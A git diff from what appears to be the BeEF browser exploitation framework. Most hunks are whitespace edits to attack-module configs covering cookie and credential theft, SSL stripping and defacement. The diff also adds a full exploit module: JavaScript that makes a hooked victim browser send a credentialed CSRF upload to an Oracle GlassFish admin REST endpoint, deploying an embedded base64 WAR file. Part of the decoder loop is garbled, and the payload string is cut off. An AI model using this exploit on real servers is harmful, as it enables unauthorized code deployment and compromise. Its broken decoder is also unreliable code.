diff --git a/install-beef b/install-beef
index 2669588ff..5428316c6 100644
--- a/install-beef
+++ b/install-beef
@@ -1,3 +1,4 @@
+#!/bin/bash
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
diff --git a/modules/browser/get_visited_domains/config.yaml b/modules/browser/get_visited_domains/config.yaml
index dfcab7cf8..ee2921948 100644
--- a/modules/browser/get_visited_domains/config.yaml
+++ b/modules/browser/get_visited_domains/config.yaml
@@ -22,5 +22,5 @@ beef:
description: "This module will retrieve rapid history extraction through non-destructive cache timing.\nBased on work done at http://lcamtuf.coredump.cx/cachetime/"
authors: ["keith_lee @keith55 http://milo2012.wordpress.com"]
target:
- working: ["FF","IE"]
- not_working: ["O","C","S"]
+ working: ["FF", "IE"]
+ not_working: ["O", "C", "S"]
diff --git a/modules/browser/hooked_domain/ajax_fingerprint/config.yaml b/modules/browser/hooked_domain/ajax_fingerprint/config.yaml
index fb4f54fc8..8216f7223 100644
--- a/modules/browser/hooked_domain/ajax_fingerprint/config.yaml
+++ b/modules/browser/hooked_domain/ajax_fingerprint/config.yaml
@@ -17,11 +17,11 @@ beef:
module:
ajax_fingerprint:
enable: true
- category: ["Browser","Hooked Domain"]
+ category: ["Browser", "Hooked Domain"]
name: "Fingerprint Ajax"
description: "Fingerprint Ajax and JS libraries present on the hooked page."
authors: ["qswain"]
target:
- working: ["FF","S"]
+ working: ["FF", "S"]
not_working: ["C"]
diff --git a/modules/browser/hooked_domain/alert_dialog/config.yaml b/modules/browser/hooked_domain/alert_dialog/config.yaml
index a5572a41d..2b9c05a1b 100644
--- a/modules/browser/hooked_domain/alert_dialog/config.yaml
+++ b/modules/browser/hooked_domain/alert_dialog/config.yaml
@@ -17,7 +17,7 @@ beef:
module:
alert_dialog:
enable: true
- category: ["Browser","Hooked Domain"]
+ category: ["Browser", "Hooked Domain"]
name: "Create Alert Dialog"
description: "Sends an alert dialog to the hooked browser."
authors: ["wade", "bm"]
diff --git a/modules/browser/hooked_domain/deface_web_page/config.yaml b/modules/browser/hooked_domain/deface_web_page/config.yaml
index 22e8fdd4d..8d57a6cfe 100644
--- a/modules/browser/hooked_domain/deface_web_page/config.yaml
+++ b/modules/browser/hooked_domain/deface_web_page/config.yaml
@@ -17,7 +17,7 @@ beef:
module:
deface_web_page:
enable: true
- category: ["Browser","Hooked Domain"]
+ category: ["Browser", "Hooked Domain"]
name: "Replace Content (Deface)"
description: "Overwrite the page, title and shortcut icon on the hooked page."
authors: ["antisnatchor"]
diff --git a/modules/browser/hooked_domain/get_cookie/config.yaml b/modules/browser/hooked_domain/get_cookie/config.yaml
index b535101ef..a5670e31e 100644
--- a/modules/browser/hooked_domain/get_cookie/config.yaml
+++ b/modules/browser/hooked_domain/get_cookie/config.yaml
@@ -17,7 +17,7 @@ beef:
module:
get_cookie:
enable: true
- category: ["Browser","Hooked Domain"]
+ category: ["Browser", "Hooked Domain"]
name: "Get Cookie"
description: "This module will retrieve the session cookie from the current page."
authors: ["bcoles"]
diff --git a/modules/browser/hooked_domain/get_local_storage/config.yaml b/modules/browser/hooked_domain/get_local_storage/config.yaml
index 2d6d5a011..f008244b3 100644
--- a/modules/browser/hooked_domain/get_local_storage/config.yaml
+++ b/modules/browser/hooked_domain/get_local_storage/config.yaml
@@ -17,7 +17,7 @@ beef:
module:
get_local_storage:
enable: true
- category: ["Browser","Hooked Domain"]
+ category: ["Browser", "Hooked Domain"]
name: "Get Local Storage"
description: "Extracts data from the HTML5 localStorage object."
authors: ["bcoles"]
diff --git a/modules/browser/hooked_domain/get_page_html/config.yaml b/modules/browser/hooked_domain/get_page_html/config.yaml
index 77e2e9109..a4e51a376 100644
--- a/modules/browser/hooked_domain/get_page_html/config.yaml
+++ b/modules/browser/hooked_domain/get_page_html/config.yaml
@@ -17,7 +17,7 @@ beef:
module:
get_page_html:
enable: true
- category: ["Browser","Hooked Domain"]
+ category: ["Browser", "Hooked Domain"]
name: "Get Page HTML"
description: "This module will retrieve the HTML from the current page."
authors: ["bcoles"]
diff --git a/modules/browser/hooked_domain/get_page_links/config.yaml b/modules/browser/hooked_domain/get_page_links/config.yaml
index fd0422e2e..1b1ed13f3 100644
--- a/modules/browser/hooked_domain/get_page_links/config.yaml
+++ b/modules/browser/hooked_domain/get_page_links/config.yaml
@@ -17,7 +17,7 @@ beef:
module:
get_page_links:
enable: true
- category: ["Browser","Hooked Domain"]
+ category: ["Browser", "Hooked Domain"]
name: "Get Page HREFs"
description: "This module will retrieve HREFs from the target page."
authors: ["vo"]
diff --git a/modules/browser/hooked_domain/get_session_storage/config.yaml b/modules/browser/hooked_domain/get_session_storage/config.yaml
index 417d52853..39d1cff08 100644
--- a/modules/browser/hooked_domain/get_session_storage/config.yaml
+++ b/modules/browser/hooked_domain/get_session_storage/config.yaml
@@ -17,7 +17,7 @@ beef:
module:
get_session_storage:
enable: true
- category: ["Browser","Hooked Domain"]
+ category: ["Browser", "Hooked Domain"]
name: "Get Session Storage"
description: "Extracts data from the HTML5 sessionStorage object."
authors: ["bcoles"]
diff --git a/modules/browser/hooked_domain/get_stored_credentials/config.yaml b/modules/browser/hooked_domain/get_stored_credentials/config.yaml
index ad865fbc1..1c01a0391 100644
--- a/modules/browser/hooked_domain/get_stored_credentials/config.yaml
+++ b/modules/browser/hooked_domain/get_stored_credentials/config.yaml
@@ -17,7 +17,7 @@ beef:
module:
get_stored_credentials:
enable: true
- category: ["Browser","Hooked Domain"]
+ category: ["Browser", "Hooked Domain"]
name: "Get Stored Credentials"
description: "This module retrieves saved username/password combinations from the login page on the hooked domain.
It will fail if more than one set of domain credentials are saved in the browser."
authors: ["bcoles"]
diff --git a/modules/browser/hooked_domain/link_rewrite/config.yaml b/modules/browser/hooked_domain/link_rewrite/config.yaml
index a2420dcae..f458eb1e0 100644
--- a/modules/browser/hooked_domain/link_rewrite/config.yaml
+++ b/modules/browser/hooked_domain/link_rewrite/config.yaml
@@ -17,7 +17,7 @@ beef:
module:
link_rewrite:
enable: true
- category: ["Browser","Hooked Domain"]
+ category: ["Browser", "Hooked Domain"]
name: "Replace HREFs"
description: "This module will rewrite all the href attributes of all matched links."
authors: ["passbe"]
diff --git a/modules/browser/hooked_domain/link_rewrite_sslstrip/config.yaml b/modules/browser/hooked_domain/link_rewrite_sslstrip/config.yaml
index ab5dbbee4..176ec2f69 100644
--- a/modules/browser/hooked_domain/link_rewrite_sslstrip/config.yaml
+++ b/modules/browser/hooked_domain/link_rewrite_sslstrip/config.yaml
@@ -17,7 +17,7 @@ beef:
module:
link_rewrite_sslstrip:
enable: true
- category: ["Browser","Hooked Domain"]
+ category: ["Browser", "Hooked Domain"]
name: "Replace HREFs (HTTPS)"
description: "This module will rewrite all the href attributes of HTTPS links to use HTTP instead of HTTPS. Links relative to the web root are not rewritten."
authors: ["bcoles"]
diff --git a/modules/browser/hooked_domain/mobilesafari_address_spoofing/config.yaml b/modules/browser/hooked_domain/mobilesafari_address_spoofing/config.yaml
index 163bf3056..b4a20fe33 100644
--- a/modules/browser/hooked_domain/mobilesafari_address_spoofing/config.yaml
+++ b/modules/browser/hooked_domain/mobilesafari_address_spoofing/config.yaml
@@ -17,10 +17,10 @@ beef:
module:
mobilesafari_address_spoofing:
enable: true
- category: ["Browser","Hooked Domain"]
+ category: ["Browser", "Hooked Domain"]
name: "iOS Address Bar Spoofing"
description: "Mobile Safari iOS 5.1 Address Bar Spoofing. This is fixed in latest version of Mobile Safari (the URL turns 'blank')"
- authors: ["bcoles","xntrik","majorsecurity.net"]
+ authors: ["bcoles", "xntrik", "majorsecurity.net"]
target:
working:
S:
diff --git a/modules/browser/hooked_domain/prompt_dialog/config.yaml b/modules/browser/hooked_domain/prompt_dialog/config.yaml
index 8b3f21ac4..0f9035279 100644
--- a/modules/browser/hooked_domain/prompt_dialog/config.yaml
+++ b/modules/browser/hooked_domain/prompt_dialog/config.yaml
@@ -17,7 +17,7 @@ beef:
module:
prompt_dialog:
enable: true
- category: ["Browser","Hooked Domain"]
+ category: ["Browser", "Hooked Domain"]
name: "Create Prompt Dialog"
description: "Sends a prompt dialog to the hooked browser."
authors: ["wade", "bm"]
diff --git a/modules/browser/hooked_domain/replace_video/config.yaml b/modules/browser/hooked_domain/replace_video/config.yaml
index 9fb293c7e..f8ddbcda0 100644
--- a/modules/browser/hooked_domain/replace_video/config.yaml
+++ b/modules/browser/hooked_domain/replace_video/config.yaml
@@ -17,7 +17,7 @@ beef:
module:
replace_video:
enable: true
- category: ["Browser","Hooked Domain"]
+ category: ["Browser", "Hooked Domain"]
name: "Replace Videos"
description: "Replaces an object selected with jQuery (all embed tags by default) with an embed tag containing the youtube video of your choice (rickroll by default)."
authors: ["Yori Kvitchko", "antisnatchor"]
diff --git a/modules/browser/hooked_domain/rickroll/config.yaml b/modules/browser/hooked_domain/rickroll/config.yaml
index d8014fcc2..f86c183fa 100644
--- a/modules/browser/hooked_domain/rickroll/config.yaml
+++ b/modules/browser/hooked_domain/rickroll/config.yaml
@@ -17,7 +17,7 @@ beef:
module:
rickroll:
enable: true
- category: ["Browser","Hooked Domain"]
+ category: ["Browser", "Hooked Domain"]
name: "Redirect Browser (Rickroll)"
description: "Overwrite the body of the page the victim is on with a full screen Rickroll."
authors: ["Yori Kvitchko"]
diff --git a/modules/browser/hooked_domain/site_redirect/config.yaml b/modules/browser/hooked_domain/site_redirect/config.yaml
index 306c3e7a2..3c9681e0a 100644
--- a/modules/browser/hooked_domain/site_redirect/config.yaml
+++ b/modules/browser/hooked_domain/site_redirect/config.yaml
@@ -17,7 +17,7 @@ beef:
module:
site_redirect:
enable: true
- category: ["Browser","Hooked Domain"]
+ category: ["Browser", "Hooked Domain"]
name: "Redirect Browser"
description: "This module will redirect the selected hooked browser to the address specified in the 'Redirect URL' input."
authors: ["wade", "vo"]
diff --git a/modules/browser/hooked_domain/site_redirect_iframe/config.yaml b/modules/browser/hooked_domain/site_redirect_iframe/config.yaml
index 9e5d349c3..ad73b2efe 100644
--- a/modules/browser/hooked_domain/site_redirect_iframe/config.yaml
+++ b/modules/browser/hooked_domain/site_redirect_iframe/config.yaml
@@ -17,7 +17,7 @@ beef:
module:
site_redirect_iframe:
enable: true
- category: ["Browser","Hooked Domain"]
+ category: ["Browser", "Hooked Domain"]
name: "Redirect Browser (iFrame)"
description: "This module creates a 100% x 100% overlaying iframe and keeps the browers hooked to the framework. The content of the iframe, page title, page shortcut icon and the time delay are specified in the parameters below.
The content of the URL bar will not be changed in the hooked browser."
authors: ["ethicalhack3r", "Yori Kvitchko"]
diff --git a/modules/exploits/camera/dlink_dcs_series_csrf/config.yaml b/modules/exploits/camera/dlink_dcs_series_csrf/config.yaml
index 2920b7a84..af3d4a3f0 100644
--- a/modules/exploits/camera/dlink_dcs_series_csrf/config.yaml
+++ b/modules/exploits/camera/dlink_dcs_series_csrf/config.yaml
@@ -19,7 +19,7 @@ beef:
module:
Dlink_dcs_series_csrf:
enable: true
- category: ["Exploits","Camera"]
+ category: ["Exploits", "Camera"]
name: "Dlink DCS series CSRF"
description: "Attempts to change the password on a Dlink DCS series camera."
authors: ["bcoles"]
diff --git a/modules/exploits/glassfish_war_upload_xsrf/command.js b/modules/exploits/glassfish_war_upload_xsrf/command.js
new file mode 100644
index 000000000..a7d2744ad
--- /dev/null
+++ b/modules/exploits/glassfish_war_upload_xsrf/command.js
@@ -0,0 +1,224 @@
+//
+// Copyright 2012 Wade Alcorn wade@bindshell.net
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+
+// This exploit is based on the PoC by Roberto Suggi Liverani - Security-Assessment.com
+// For more info, refer to: http://blog.malerisch.net/2012/04/oracle-glassfish-server-rest-csrf.html
+
+
+beef.execute(function() {
+ var restHost = '<%= @restHost %>';
+ var warName = '<%= @warName %>';
+ var warBase = '<%= @warBase %>';
+
+ var logUrl = restHost + '/management/domain/applications/application';
+
+ //BEGIN Daniel Guerrero binary Base64-library
+/*
+Copyright (c) 2011, Daniel Guerrero
+All rights reserved.
+
+Redistribution and use in source and binary forms, with or without
+modification, are permitted provided that the following conditions are met:
+ * Redistributions of source code must retain the above copyright
+ notice, this list of conditions and the following disclaimer.
+ * Redistributions in binary form must reproduce the above copyright
+ notice, this list of conditions and the following disclaimer in the
+ documentation and/or other materials provided with the distribution.
+ * Neither the name of the Daniel Guerrero nor the
+ names of its contributors may be used to endorse or promote products
+ derived from this software without specific prior written permission.
+
+THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
+ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
+WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
+DISCLAIMED. IN NO EVENT SHALL DANIEL GUERRERO BE LIABLE FOR ANY
+DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
+(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
+ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
+(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
+SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
+ */
+
+/**
+ * Uses the new array typed in javascript to binary base64 encode/decode
+ * at the moment just decodes a binary base64 encoded
+ * into either an ArrayBuffer (decodeArrayBuffer)
+ * or into an Uint8Array (decode)
+ *
+ * References:
+ * https://developer.mozilla.org/en/JavaScript_typed_arrays/ArrayBuffer
+ * https://developer.mozilla.org/en/JavaScript_typed_arrays/Uint8Array
+ */
+
+var Base64Binary = {
+ _keyStr : "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",
+
+ /* will return a Uint8Array type */
+ decodeArrayBuffer: function(input) {
+ var bytes = Math.ceil( (3*input.length) / 4.0);
+ var ab = new ArrayBuffer(bytes);
+ this.decode(input, ab);
+
+ return ab;
+ },
+
+ decode: function(input, arrayBuffer) {
+ //get last chars to see if are valid
+ var lkey1 = this._keyStr.indexOf(input.charAt(input.length-1));
+ var lkey2 = this._keyStr.indexOf(input.charAt(input.length-1));
+
+ var bytes = Math.ceil( (3*input.length) / 4.0);
+ if (lkey1 == 64) bytes--; //padding chars, so skip
+ if (lkey2 == 64) bytes--; //padding chars, so skip
+
+ var uarray;
+ var chr1, chr2, chr3;
+ var enc1, enc2, enc3, enc4;
+ var i = 0;
+ var j = 0;
+
+ if (arrayBuffer)
+ uarray = new Uint8Array(arrayBuffer);
+ else
+ uarray = new Uint8Array(bytes);
+
+ input = input.replace(/[^A-Za-z0-9\+\/\=]/g, "");
+
+ for (i=0; i> 4);
+ chr2 = ((enc2 & 15) << 4) | (enc3 >> 2);
+ chr3 = ((enc3 & 3) << 6) | enc4;
+
+ uarray[i] = chr1;
+ if (enc3 != 64) uarray[i+1] = chr2;
+ if (enc4 != 64) uarray[i+2] = chr3;
+ }
+
+ return uarray;
+ }
+}
+ //END Daniel Guerrero binary Base64-library
+
+ if (typeof XMLHttpRequest.prototype.sendAsBinary == 'undefined' && Uint8Array) {
+ XMLHttpRequest.prototype.sendAsBinary = function(datastr) {
+ function byteValue(x) {
+ return x.charCodeAt(0) & 0xff;
+ }
+ var ords = Array.prototype.map.call(datastr, byteValue);
+ var ui8a = new Uint8Array(ords);
+ this.send(ui8a.buffer);
+ }
+ }
+
+ function fileUpload(fileData, fileName) {
+ boundary = "HELLOWORLD270883142628617",
+ uri = logUrl,
+ xhr = new XMLHttpRequest();
+
+ var additionalFields = {
+ asyncreplication: "true",
+ availabilityenabled: "false",
+ contextroot: "",
+ createtables: "true",
+ dbvendorname: "",
+ deploymentplan: "",
+ description: "",
+ dropandcreatetables: "true",
+ enabled: "true",
+ force: "false",
+ generatermistubs: "false",
+ isredeploy: "false",
+ keepfailedstubs: "false",
+ keepreposdir: "false",
+ keepstate: "true",
+ lbenabled: "true",
+ libraries: "",
+ logReportedErrors: "true",
+ name: "",
+ precompilejsp: "false",
+ properties: "",
+ property: "",
+ retrieve: "",
+ target: "",
+ type: "",
+ uniquetablenames: "true",
+ verify: "false",
+ virtualservers: "",
+ __remove_empty_entries__: "true"
+ }
+
+
+ var fileFieldName = "id";
+ xhr.open("POST", uri, true);
+ xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary="+boundary); // simulate a file MIME POST request.
+ xhr.withCredentials = "true";
+ xhr.onreadystatechange = function() {
+ if (xhr.readyState == 4) {
+ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'Attempt to deploy \"' + warName + '\" completed.');
+ }
+ }
+
+ var body = "";
+
+ for (var i in additionalFields) {
+ if (additionalFields.hasOwnProperty(i)) {
+ body += addField(i, additionalFields[i], boundary);
+ }
+ }
+
+ body += addFileField(fileFieldName, fileData, fileName, boundary);
+ body += "--" + boundary + "--";
+ xhr.setRequestHeader('Content-length', body.length);
+ xhr.sendAsBinary(body);
+ return true;
+ }
+
+ function addField(name, value, boundary) {
+ var c = "--" + boundary + "\r\n"
+ c += 'Content-Disposition: form-data; name="' + name + '"\r\n\r\n';
+ c += value + "\r\n";
+ return c;
+ }
+
+ function addFileField(name, value, filename, boundary) {
+ var c = "--" + boundary + "\r\n"
+ c += 'Content-Disposition: form-data; name="' + name + '"; filename="' + filename + '"\r\n';
+ c += "Content-Type: application/octet-stream\r\n\r\n";
+
+ for(var i = 0; i< value.length; i++){
+ c+=String.fromCharCode(value[i] & 0xff);
+ }
+
+ c += "\r\n";
+ return c;
+ }
+
+
+ function start() {
+ fileUpload(Base64Binary.decode(warBase),warName);
+ }
+
+ start();
+
+});
+
diff --git a/modules/exploits/glassfish_war_upload_xsrf/config.yaml b/modules/exploits/glassfish_war_upload_xsrf/config.yaml
new file mode 100644
index 000000000..b92c453c9
--- /dev/null
+++ b/modules/exploits/glassfish_war_upload_xsrf/config.yaml
@@ -0,0 +1,25 @@
+#
+# Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+beef:
+ module:
+ glassfish_war_upload_xsrf:
+ enable: true
+ category: "Exploits"
+ name: "GlassFish WAR Upload XSRF"
+ description: "This module attempts to deploy a malicious war file on an Oracle GlassFish Server 3.1.1 (build 12). It makes advantage of a CSRF bug in the REST interface.
For more information refer to http://blog.malerisch.net/2012/04/oracle-glassfish-server-rest-csrf.html."
+ authors: ["Bart Leppens"]
+ target:
+ working: ["FF", "S", "C"]
diff --git a/modules/exploits/glassfish_war_upload_xsrf/module.rb b/modules/exploits/glassfish_war_upload_xsrf/module.rb
new file mode 100644
index 000000000..a18ca8cd4
--- /dev/null
+++ b/modules/exploits/glassfish_war_upload_xsrf/module.rb
@@ -0,0 +1,32 @@
+#
+# Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+class Glassfish_war_upload_xsrf < BeEF::Core::Command
+
+ def self.options
+ return [
+ {'name' => 'restHost', 'ui_label'=>'Host', 'type' => 'textarea', 'value' =>'http://glassfishserver:4848', 'width' => '400px', 'height' => '25px'},
+ {'name' => 'warName', 'ui_label' => 'Filename', 'value' => 'hello.war', 'type' => 'textarea', 'width' => '400px', 'height' => '25px' },
+ {'name' => 'warBase', 'ui_label' => 'Base64 of exploit', 'value' => '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